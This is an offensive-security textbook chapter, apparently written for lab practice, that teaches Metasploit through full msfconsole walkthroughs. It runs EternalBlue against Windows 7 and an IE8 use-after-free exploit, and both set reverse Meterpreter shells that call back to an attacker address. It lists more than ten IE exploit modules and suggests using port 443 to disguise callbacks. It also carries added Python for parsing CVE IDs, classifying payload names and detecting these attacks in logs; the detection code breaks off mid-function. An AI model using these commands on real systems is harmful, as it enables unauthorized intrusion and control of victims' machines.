How does an adversary attack a computer system? One approach is to provide data to a program running on that system that causes it to act on behalf of the attacker. The Morris worm, released in 1988, attacked vulnerable services including fingerd and sendmail, as well as poorly configured rexec and rsh. When it attacked fingerd, it sent a 536-byte request to C code using gets() that provided a buffer with only 512 bytes of space; the resulting overflow allowed the worm’s code to execute on the target.
On systems deployed between 2011 and 2017, most services that listen for unsolicited network connections have been hardened sufficiently that remote attacks against them rarely succeed. One major exception has been the EternalBlue exploit and related attacks. In general, the attackers’ focus has moved to programs that users run on these systems and that take untrusted input. The most common such program is the web browser.
In this chapter, the reader will learn how to use Metasploit to launch the EternalBlue attack and to attack web browsers and web browser plugins across a range of Windows and Linux systems. The reader will also learn how to use Metasploit to generate malware and to use it to exploit systems.
Ethics
Let me begin this chapter with a personal note about ethics.
As anyone who has done it knows, hacking is fun. It is often exciting, exhilarating, and intoxicating, but it can and does blind people to the consequences of their actions. When practicing or using offensive skills, consider: is this something you would share publicly? Would you be willing to put this on your resume? Or tell the important people in your life? Do you have explicit permission to do what you are doing? Was permission granted by someone authorized to give it?
Don’t rationalize behavior, especially after the fact. Saying that you are doing something to improve security holds no water. Imagine you came home to find someone had broken into your apartment, and their response is to tell you that they were just testing your security and by the way that you should really use better locks on your windows.
Law enforcement has gotten much better at tracking attackers that get their attention, and the size of the punishments they try to impose has become surprisingly large. Robert Morris, the author of the Morris worm, which is estimated to have infected a significant fraction of the Internet in 1988, was the first person convicted under the Federal Computer Fraud and Abuse Act; he was sentenced to three years’ probation, fined $10,000, and ordered to perform 400 hours of community service.[1] Compare that with the story of Aaron Swartz, who in 2010 and 2011 downloaded copies of many academic journals. He was caught and charged with fraud and with violating the Federal Computer Fraud and Abuse Act, which could have resulted in 35 years in prison and a million-dollar fine;[2] instead, he committed suicide.[3]
Metasploit
Metasploit is a popular penetration testing tool that comes preinstalled on Kali systems. It is composed of separate tools, including msfconsole, the core interactive text program that allows a user to interact with the different Metasploit components; and msfvenom, which is used to generate payloads and stand-alone malware.
There are graphical user interfaces available for Metasploit; one popular tool available on Kali is Armitage.
Metasploit is a modular tool and separates the exploit, which attacks the vulnerable target, from the payload, which is what is run on the target after a successful exploit. Metasploit also provides separate auxiliary modules, many of which are used for network discovery; and post-exploitation modules, which are run on targets after a successful exploit, often to escalate privileges on the target.
Vulnerabilities
Metasploit exploit modules generally target a single vulnerability on the target. A vulnerability in software is a flaw that can potentially be used by an unauthorized user to cross a security boundary. To provide a uniform method to refer to vulnerabilities, the dictionary of Common Vulnerabilities and Exposures (CVE) was created.
Not all vulnerabilities are sufficiently serious to warrant a CVE number. Referencing a vulnerability by its CVE number helps different researchers be sure that they are talking about the same underlying issue. CVE numbers have the form CVE-YYYY-ZZZZ, where YYYY is the year and ZZZZ is an identifier within that year, like CVE 2008-4250. Prior to 2014, the identifier was exactly four digits; since then it has at least four digits and may be longer. The full CVE list is available at https://cve.mitre.org.
Security problems in Microsoft products are also commonly identified by the Microsoft Security Bulletin that addresses the issue. These are labeled in the form MSYY-ZZZ where YY is a two-digit year and ZZZ is an identifier within that year, like MS08-067.
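The two identifier formats just described are what an analyst has to normalize when correlating advisories, Microsoft bulletins, and Metasploit module descriptions, which often write the CVE with a space instead of a hyphen, as this chapter does. The following Python is an added example, not code from the book or from Metasploit. It implements the page's CVE rules (four-digit year; exactly four sequence digits before 2014, four or more since) and the MSYY-ZZZ bulletin form; the 1998 cutoff used to expand a bulletin's two-digit year is an assumption of this example, and the sample sentence it scans is the chapter's own description of EternalBlue.

```python
import re
from dataclasses import dataclass

# Canonical form "CVE-2017-0144"; the space-separated form "CVE 2017-0144" used
# in prose is accepted too. Year is four digits; the sequence is four or more.
_CVE_RE = re.compile(r"^CVE[- ](?P<year>\d{4})-(?P<seq>\d{4,})$", re.IGNORECASE)
# Microsoft Security Bulletin form MSYY-ZZZ, for example MS17-010.
_MS_RE = re.compile(r"^MS(?P<yy>\d{2})-(?P<seq>\d{3})$", re.IGNORECASE)
# Both forms, for scanning free text such as an advisory or a module description.
_ANY_RE = re.compile(r"\b(?:CVE[- ]\d{4}-\d{4,}|MS\d{2}-\d{3})\b", re.IGNORECASE)


@dataclass(frozen=True)
class CveId:
    year: int
    sequence: int

    def __str__(self) -> str:
        # Sequences shorter than four digits are zero-padded; longer ones are kept.
        return f"CVE-{self.year}-{self.sequence:04d}"


@dataclass(frozen=True)
class MsBulletin:
    year: int  # full four-digit year
    sequence: int

    def __str__(self) -> str:
        return f"MS{self.year % 100:02d}-{self.sequence:03d}"


def parse_cve(text: str) -> CveId:
    """Parse one CVE identifier, enforcing the pre-2014 four-digit rule."""
    m = _CVE_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a CVE identifier: {text!r}")
    year, seq = int(m.group("year")), m.group("seq")
    if year < 2014 and len(seq) != 4:
        raise ValueError(f"pre-2014 CVE identifiers have exactly four sequence digits: {text!r}")
    return CveId(year, int(seq))


def parse_ms_bulletin(text: str) -> MsBulletin:
    """Parse one Microsoft Security Bulletin identifier."""
    m = _MS_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a Microsoft bulletin identifier: {text!r}")
    yy = int(m.group("yy"))
    # Assumption of this example: bulletins were numbered from 1998 onward, so
    # 98 and 99 are 1990s years and every other two-digit year is in the 2000s.
    year = 1900 + yy if yy >= 98 else 2000 + yy
    return MsBulletin(year, int(m.group("seq")))


def extract_vuln_ids(text: str) -> list:
    """Return the normalized identifiers in text, de-duplicated, in order of first appearance."""
    found = []
    for m in _ANY_RE.finditer(text):
        token = m.group(0)
        try:
            ident = parse_cve(token) if token[:3].upper() == "CVE" else parse_ms_bulletin(token)
        except ValueError:
            continue  # malformed reference; leave it for a human to look at
        if str(ident) not in found:
            found.append(str(ident))
    return found


# Constructed sample: the sentence from this chapter describing EternalBlue.
SAMPLE_TEXT = (
    "The underlying vulnerability was patched by Microsoft in MS17-010, while the "
    "vulnerabilities themselves are numbered CVE 2017-0143, CVE 2017-0144, "
    "CVE 2017-0145, CVE 2017-0146, CVE 2017-0147, and CVE 2017-0148."
)

if __name__ == "__main__":
    for ident in extract_vuln_ids(SAMPLE_TEXT):
        print(ident)
```

Running the file prints the seven identifiers from the sample in canonical form; a pre-2014 CVE with more than four sequence digits is rejected by parse_cve and silently skipped by extract_vuln_ids, which is the behaviour a correlation job usually wants.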
Metasploit: EternalBlue
In April 2017, a group calling themselves the Shadow Brokers released a collection of exploit tools that they claimed had been used by the NSA. One of the tools was named EternalBlue and exploited a vulnerability in Windows SMB. The underlying vulnerability was patched by Microsoft in MS17-010, while the vulnerabilities themselves are numbered CVE 2017-0143, CVE 2017-0144, CVE 2017-0145, CVE 2017-0146, CVE 2017-0147, and CVE 2017-0148.
Attack: EternalBlue on Windows 7 SP1
The Metasploit module that exploits this vulnerability is exploit/windows/smb/ms17_010_eternalblue. This Metasploit module affects only 64-bit systems running Windows 7 or Windows Server 2008 R2. The target system must be configured so that TCP/445 is accessible to the attacker. The related module exploit/windows/smb/ms17_010_eternalblue_win8 affects Windows 8, 8.1, and 10.
Configuring the Metasploit Internal Database
Metasploit uses a PostgreSQL database to store its data, and that database is not started by default on Kali. Though Metasploit can function without its database, it is preferable to have it available. Start the database, ensure that it starts automatically on subsequent boots, and initialize the Metasploit database with the following commands.
root@Kali201602:~# systemctl start postgresql
root@Kali201602:~# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
root@Kali201602:~# msfdb init
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
These steps only need to be performed once on a Kali system; afterwards the database will be functioning correctly.[4]
Launching Metasploit
Start the Metasploit tool msfconsole from the command line by running
root@Kali201602:~# msfconsole -q
msf >
Here the -q switch is used with msfconsole to suppress the amusing but large startup banner. Be patient; it can take a moment or two before the msf > prompt is ready. Once Metasploit is running, verify that it is connected to the database with the command
msf > db_status
[*] postgresql connected to msf
Selecting the Exploit
From Metasploit, select the EternalBlue exploit with the use command.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >
Notice that the command prompt has changed; now it includes the exploit module as part of the prompt.
The info command provides the user with information about the chosen exploit.
msf exploit(ms17_010_eternalblue) > info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Basic options:
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
GroomDelta          5                yes       The amount to increase the groom count by per try.
MaxExploitAttempts  3                yes       The number of times to retry the exploit.
ProcessName         spoolsv.exe      yes       Process to inject payload into.
RHOST                                yes       The target address
RPORT               445              yes       The target port (TCP)
SMBDomain           .                no        (Optional) The Windows domain to use for authentication
SMBPass                              no        (Optional) The password for the specified username
SMBUser                              no        (Optional) The username to authenticate as
VerifyArch          true             yes       Check if remote architecture matches exploit Target.
VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser,SMBPass, and SMBDomain options it will use those instead. On
some systems, this module may cause system instability and crashes,
such as a BSOD or a reboot. This may be more likely with some
payloads.
... Output Deleted ...
Setting Options
Before the exploit can be run, the required options need to have values chosen. For this exploit module, the only required option that is initially unset is RHOST; this is the IP address or hostname of the target. Suppose that 10.0.15.210 is the IP address of a 64-bit Windows 7 (SP 1) system that has TCP/445 accessible to the attacker. To target this system, the attacker configures the option in the module with the set command.
msf exploit(ms17_010_eternalblue) > set rhost 10.0.15.210
rhost => 10.0.15.210
Choosing the Payload
Before the attack is launched, the attacker needs to determine what to do if the attack is successful. This is done by selecting a payload. A payload can be code that is run on the remote system, or it can be as simple as a single command. The available payloads for an exploit can be seen with the command show payloads.
msf exploit(ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
Name                                   Rank    Description
----                                   ----    -----------
generic/custom                         normal  Custom Payload
generic/shell_bind_tcp                 normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp              normal  Generic Command Shell, Reverse TCP Inline
windows/x64/exec                       normal  Windows x64 Execute Command
windows/x64/loadlibrary                normal  Windows x64 LoadLibrary Path
... Output Deleted ...
windows/x64/meterpreter/reverse_http   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/meterpreter/reverse_https  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/meterpreter/reverse_tcp    normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
... Output Deleted ...
The most commonly used payload is Meterpreter. Meterpreter is a program designed to be run on the target and provides the attacker with a collection of features that allow them to control their target. Meterpreter can be run in many ways; in some, the target system opens a port and waits for the attacker to connect to that port. Because this approach is easily stopped by firewalls, the usual approach is a reverse shell. In this case, the target system calls back to the attacking system; this can be done over HTTP, HTTPS, or over a custom TCP port.
In this example, the attacker elects to use Meterpreter calling back over TCP.
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
Once the payload is selected, additional options may need to be configured. The command show options lists the currently selected options for the exploit and for the payload.
msf exploit(ms17_010_eternalblue) > show options
... Output Deleted ...
Exploit target:
Id  Name
--  ----
0   Windows 7 and Server 2008 R2 (x64) All Service Packs
In this case, the required option, LHOST, still needs to be set. This is the address of the system that the attacker will call back to. The simplest value here is the IP address of the Kali system that is being used to launch the attack. In this case, when the attack is launched, Metasploit will automatically configure a listener to handle the callback from the target.
msf exploit(ms17_010_eternalblue) > set lhost 10.0.2.2
lhost => 10.0.2.2
Note that the variable names in Metasploit are not case sensitive.
Launching the Exploit
With the required options selected, the exploit can be launched with the command exploit or the command run.
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.0.2.2:4444
[*] 10.0.15.210:445 - Connecting to target for exploitation.
[+] 10.0.15.210:445 - Connection established for exploitation.
[+] 10.0.15.210:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.15.210:445 - CORE raw buffer dump (42 bytes)
... Output Deleted ...
meterpreter >
If the exploit reports that the connection timed out, this is often caused by a firewall on the target. For the purposes of testing the exploit, consider disabling the firewall on the Windows target.
Interacting with Meterpreter
The change in the command prompt shows that the attacker is now interacting with Meterpreter running on the remote system. The attacker can then issue commands and have them run on the remote system. To determine basic information about the system, the Meterpreter command sysinfo can be used.
meterpreter > sysinfo
Computer : EDGEWORTH
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : PLUTO
Logged On Users : 2
Meterpreter : x64/windows
To determine the user ID that is being used to run Meterpreter, the command getuid can be used.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This exploit escalates privileges to SYSTEM on the target, but this is quite unusual; most exploits simply provide access to the target and other exploits or techniques are needed before gaining SYSTEM.
The attacker can interact with a traditional command prompt on the remote target by issuing the shell command.
meterpreter > shell
Process 1816 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
To exit the shell and return to Meterpreter, press CTRL+Z.
C:\Windows\system32>^Z
Background channel 1? [y/N] y
Metasploit Sessions
When the attacker is done interacting with this target, they can use the background command.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) >
The attacker is now interacting with Metasploit rather than with the instance of Meterpreter that has been deployed on the target at 10.0.15.210.
Metasploit can manage multiple sessions. To see the currently running sessions, the attacker can use the sessions command. The command help sessions shows some of the options to the sessions command.
msf exploit(ms17_010_eternalblue) > help sessions
... Output Deleted ...
    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List sessions in verbose mode
    -x        Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
If the attacker wishes to continue interacting with the session established with 10.0.15.210, they can return to the Meterpreter command prompt with
msf exploit(ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Exiting Metasploit
If the attacker has finished their work with Metasploit entirely, then from the Metasploit command prompt they can issue the command exit. If Metasploit currently has established sessions with remote systems, the attacker needs to confirm the request to exit.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(ms17_010_eternalblue) > exit -y
root@kali-2016-2-u:~#
Metasploit: Attacking the Browser
Another way an attacker can obtain a shell on a remote system is by attacking the browser. To do so, the attacker uses Metasploit to create a URL that hosts malicious code. The exploit code targets a particular vulnerability, is (usually) specific to the browser and its patch level, and is configured to provide a payload that the target executes. Once the victim browses to that URL, the exploit runs. If the exploit is successful, the payload will execute and usually provide a way for the attacker to interact with the target system.
Metasploit Modules for Internet Explorer
There are many exploits that can be used to attack particular versions of Internet Explorer and a few that affect Firefox. In contrast, there are currently none available that target Chrome.
The following Metasploit modules can be used to attack Internet Explorer directly. Each listed exploit begins with a descriptive exploit title. Next is the name that is used to refer to the exploit from within Metasploit. For Internet Explorer vulnerabilities, these usually take the form exploit/windows/browser/<name>. Next is the CVE number for the vulnerability that is being exploited and then the identifier for the Microsoft Security Bulletin that addresses the vulnerability. This is followed by the version or versions of Windows and Internet Explorer that the exploit can successfully attack. In some cases, additional software is required to be present on the target for the exploit to function; if this is the case, it is noted.
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
exploit/windows/browser/ms11_003_ie_css_import
CVE 2010-3971, MS11-003
Internet Explorer 8 on Windows 7 (including SP 1)
Requires .NET 2.0.50727 installed on the target. This is included by default on Windows 7 SP1.
MS11-081 Microsoft Internet Explorer Option Element Use-After-Free
exploit/windows/browser/ms11_081_option
CVE 2011-1996, MS11-081
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
exploit/windows/browser/ms12_037_ie_colspan
CVE 2010-1876, MS12-037
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability
exploit/windows/browser/ie_cbutton_uaf
CVE 2012-4792, MS13-008
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
exploit/windows/browser/ie_execcommand_uaf
CVE 2012-4969, MS12-063
Internet Explorer 8, 9 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
exploit/windows/browser/ie_cgenericelement_uaf
CVE 2013-1347, MS13-038
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
exploit/windows/browser/ms13_037_svg_dashstyle
CVE 2013-2551, MS13-037
Internet Explorer 8 on Windows 7 (SP1 only; x86)
MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
exploit/windows/browser/ms13_055_canchor
CVE 2013-3163, MS13-055
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
exploit/windows/browser/ms13_080_cdisplaypointer
CVE 2013-3897, MS13-080
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
exploit/windows/browser/ms14_012_cmarkup_uaf
CVE 2014-0322, MS14-012
Internet Explorer 10 on Windows 7 (including SP1)
Requires Flash Player 12 on the target
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
Internet Explorer 8-11 on Windows 7 (including SP1)
Attack: MS13-055 CAnchorElement
To demonstrate the use of Metasploit to attack a browser, suppose an attacker targets Internet Explorer 8 on a Windows 7 Service Pack 1 system with the MS13-055 CAnchorElement attack. This is representative of the process needed for the other exploits.
Starting the Exploit
Start a Windows 7 Service Pack 1 virtual machine with Java 6 installed as the target. From Metasploit on the attacker’s Kali system, select the MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free exploit module with the use command, and display its details with info.
msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > info
Name: MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
Module: exploit/windows/browser/ms13_055_canchor
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-07-09
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Automatic
1 IE 8 on Windows XP SP3
2 IE 8 on Windows 7
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)
Payload information:
Avoid: 1 characters
Description:
In IE8 standards mode, it's possible to cause a use-after-free
condition by first creating an illogical table tree, where a
CPhraseElement comes after CTableRow, with the final node being a
sub table element. When the CPhraseElement's outer content is reset
by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a
CAnchorElement, but some other objects apply too), but a reference
is still kept in function SRunPointer::SpanQualifier. This function
will then pass on the invalid reference to the next functions,
eventually used in mshtml!CElement::Doc when it's trying to make a
call to the object's SecurityContext virtual function at offset
+0x70, which results a crash. An attacker can take advantage of this
by first creating an CAnchorElement object, let it free, and then
replace the freed memory with another fake object. Successfully
doing so may allow arbitrary code execution under the context of the
user. This bug is specific to Internet Explorer 8 only. It was
originally discovered by Jose Antonio Vazquez Gonzalez and reported
to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.
... Output Deleted ...
Configuring the Exploit
Many Metasploit modules provide automatic targeting, including this exploit. In this case, the target is known to be a Windows 7 system, so set the target appropriately using the set command.
msf exploit(ms13_055_canchor) > set target 2
target => 2
Most basic options are well explained by the info command; for example, the SRVHOST and SRVPORT variables provide the IP address and port number that will be used to host the exploit. The variable URIPATH is the URI for the exploit; if this is not changed, then a random URI will be generated. Fix the URI to an innocuous value, say “bob”; after all, Bob is a builder, not a hacker.
msf exploit(ms13_055_canchor) > set uripath bob
uripath => bob
Choosing the Payload
At this point, the exploit is configured, but the payload is not. Once an exploit and a target have been selected, the list of available payloads can be enumerated by the command
msf exploit(ms13_055_canchor) > show payloads
Compatible Payloads
===================
Name                    Rank    Description
----                    ----    -----------
generic/custom          normal  Custom Payload
generic/debug_trap      normal  Generic x86 Debug Trap
generic/shell_bind_tcp  normal  Generic Command Shell, Bind TCP Inline
... Output Deleted ...
There are more than 150 possible payloads that are compatible with this exploit. These payloads can be roughly classified by the payload’s action and communication method. Major actions include the following:
running Meterpreter on the target,
running a command shell on the target,
running VNC on the target,
running a single command on the target, and
uploading and executing a file or injecting a DLL.
Major communication methods include these:
reverse connections, where the target calls back to the attacker, and
forward connections, where the attacker calls out to the victim.
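Metasploit’s payload names encode the classification above: the path ends either in stage/stager for a staged payload (a small stager connects first and fetches the real payload) or in a single action_direction_transport token for an inline payload, and a bare action such as exec or custom opens no connection of its own. The following Python is an added example rather than code from the book or from Metasploit; it parses names drawn from this chapter’s payload listings into that classification. The naming convention it relies on is Metasploit’s, while the parser, the PayloadInfo fields, and describe_payload are this example’s own.

```python
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may appear between the platform and the payload
# proper, as in windows/x64/meterpreter/reverse_tcp.
KNOWN_ARCHES = {"x86", "x64"}
CONNECTION_KINDS = ("reverse", "bind")


@dataclass(frozen=True)
class PayloadInfo:
    platform: str             # generic, windows, firefox, ...
    arch: Optional[str]       # x64, x86, or None when the name carries no arch
    action: str               # what runs on the target: meterpreter, shell, exec, ...
    direction: Optional[str]  # "reverse" (target calls back), "bind" (attacker connects in), None
    transport: Optional[str]  # tcp, http, https, ... or None
    staged: bool              # True when a small stager fetches the real payload


def _split_connection(token: str):
    """'reverse_https' -> ('reverse', 'https'); anything else -> (None, None)."""
    kind, _, transport = token.partition("_")
    if kind in CONNECTION_KINDS and transport:
        return kind, transport
    return None, None


def classify_payload(name: str) -> PayloadInfo:
    parts = name.split("/")
    if len(parts) < 2:
        raise ValueError(f"malformed payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest and rest[0] in KNOWN_ARCHES else None
    if len(rest) == 2:
        # Staged: "<stage>/<stager>", the stager naming the connection method.
        action, stager = rest
        direction, transport = _split_connection(stager)
        if direction is None:
            raise ValueError(f"unrecognized stager in {name!r}")
        return PayloadInfo(platform, arch, action, direction, transport, True)
    if len(rest) == 1:
        # Inline (single): "<action>_<direction>_<transport>", or a bare action
        # such as exec or custom that opens no connection of its own.
        token = rest[0]
        for kind in CONNECTION_KINDS:
            marker = f"_{kind}_"
            if marker in token:
                action, transport = token.split(marker, 1)
                return PayloadInfo(platform, arch, action, kind, transport, False)
        return PayloadInfo(platform, arch, token, None, None, False)
    raise ValueError(f"malformed payload name: {name!r}")


def describe_payload(name: str) -> str:
    """One-line summary of what a payload does and which way it connects."""
    p = classify_payload(name)
    kind = "staged" if p.staged else "inline"
    if p.direction == "reverse":
        conn = f"target connects out to the attacker over {p.transport}"
    elif p.direction == "bind":
        conn = f"target listens for the attacker over {p.transport}"
    else:
        conn = "no connection of its own"
    where = p.platform + ("/" + p.arch if p.arch else "")
    return f"{kind} {p.action} on {where}; {conn}"


# Constructed sample drawn from the payload listings shown in this chapter.
SAMPLE_PAYLOADS = [
    "generic/custom",
    "generic/shell_bind_tcp",
    "windows/x64/exec",
    "windows/x64/meterpreter/reverse_https",
    "windows/meterpreter/reverse_https",
    "firefox/shell_reverse_tcp",
]

if __name__ == "__main__":
    for n in SAMPLE_PAYLOADS:
        print(f"{n:40} {describe_payload(n)}")
```

The direction field is the one that matters for a host firewall: a bind payload needs an inbound port open on the target, which is why the chapter notes that approach is easily stopped, while a reverse payload needs only outbound access from the target.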
Select the Meterpreter payload that connects back to the attacker via reverse HTTPS with the command
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_055_canchor) > show options
... Output Deleted ...
Payload options (windows/meterpreter/reverse_https):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The local listener hostname
LPORT     8443             yes       The local listener port
LURI                       no        The HTTP Path
Exploit target:
Id  Name
--  ----
2   IE 8 on Windows 7
The only required option unset is the IP address of the Metasploit system that will catch the callback from the victim. The simplest approach is to use the same system that is hosting the exploit, though this is not required. To camouflage the connection and make it look more like real HTTPS traffic, set the payload’s listening port to 443.
msf exploit(ms13_055_canchor) > set lhost 172.16.30.3
lhost => 172.16.30.3
msf exploit(ms13_055_canchor) > set lport 443
lport => 443
Launching the Exploit as a Background Job
The exploit is now ready to launch. To launch the exploit and have it run in the background as a job, run
msf exploit(ms13_055_canchor) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://172.16.30.3:443
msf exploit(ms13_055_canchor) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://172.16.30.3:8080/bob
[*] Server started.
Because the exploit was run as a background job, the command prompt reappeared while the exploit was still writing to the screen; this is common.
Interacting with the Shell
Return to the Windows target and use Internet Explorer to browse to the URL specified in the exploit. In the example, the server is running at 172.16.30.3, on port 8080, with URI bob, so visit the page http://172.16.30.3:8080/bob. On the Windows system, the browser will simply hang and crash; Task Manager (CTRL+ALT+DEL) may be needed to stop it.
On the Kali system, Metasploit reports the connection and notifies the attacker that a session has been created.
To interact with the session from this target, use sessions -i.
msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SOHO
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: SOHO\David Hilbert
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms13_055_canchor) >
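Seen from the defender’s side, the two attacks above leave a recognizable sequence in connection logs: the EternalBlue target accepts an SMB connection on TCP/445 and, seconds later, opens a connection back to the same peer (10.0.15.210 to 10.0.2.2:4444 in the first transcript), and the browser victim first fetches the exploit page from an IP-literal host on port 8080 (http://172.16.30.3:8080/bob) before calling back. The following Python is an added example, not code from the book or from Metasploit. It runs three such rules over constructed log lines in a key=value format that is this example’s own, using the chapter’s addresses and the default ports seen in its transcripts. Port-based rules only see defaults, and the IE attack above moves the handler to 443 precisely to blend in; the SMB-then-callback rule is keyed on the sequence rather than the port and so still fires in that case.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional
from urllib.parse import urlsplit

# Ports taken from the chapter's transcripts. They are only defaults: the
# chapter itself moves the HTTPS handler to 443, which rule 1 will not see.
DEFAULT_HANDLER_PORTS = {4444: "reverse TCP handler", 8443: "reverse HTTPS handler"}
DEFAULT_EXPLOIT_SERVER_PORT = 8080  # SRVPORT default of the browser exploit modules
SMB_PORT = 445

# Constructed log format (assumption of this example): one connection per line,
# key=value fields, with an optional url= field when a web proxy saw the request.
_LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)(?: url=(?P<url>\S+))?$"
)


@dataclass
class Event:
    ts: datetime
    src: str
    dst: str
    dport: int
    url: Optional[str] = None


@dataclass
class Alert:
    rule: str
    event: Event
    detail: str


def parse_line(line: str) -> Optional[Event]:
    m = _LINE_RE.match(line.strip())
    if not m:
        return None  # unparseable line: skip it rather than abort the whole run
    return Event(datetime.fromisoformat(m.group("ts")), m.group("src"), m.group("dst"),
                 int(m.group("dport")), m.group("url"))


def _is_ip_literal(host: Optional[str]) -> bool:
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def detect(lines: List[str], window: timedelta = timedelta(seconds=60)) -> List[Alert]:
    alerts: List[Alert] = []
    recent_smb = {}  # (smb target, smb client) -> time of the latest inbound SMB connection
    for ev in filter(None, map(parse_line, lines)):
        # Rule 1: connection to a default Metasploit handler port.
        if ev.dport in DEFAULT_HANDLER_PORTS:
            alerts.append(Alert("default-handler-port", ev,
                                f"{ev.dst}:{ev.dport} is the default {DEFAULT_HANDLER_PORTS[ev.dport]} port"))
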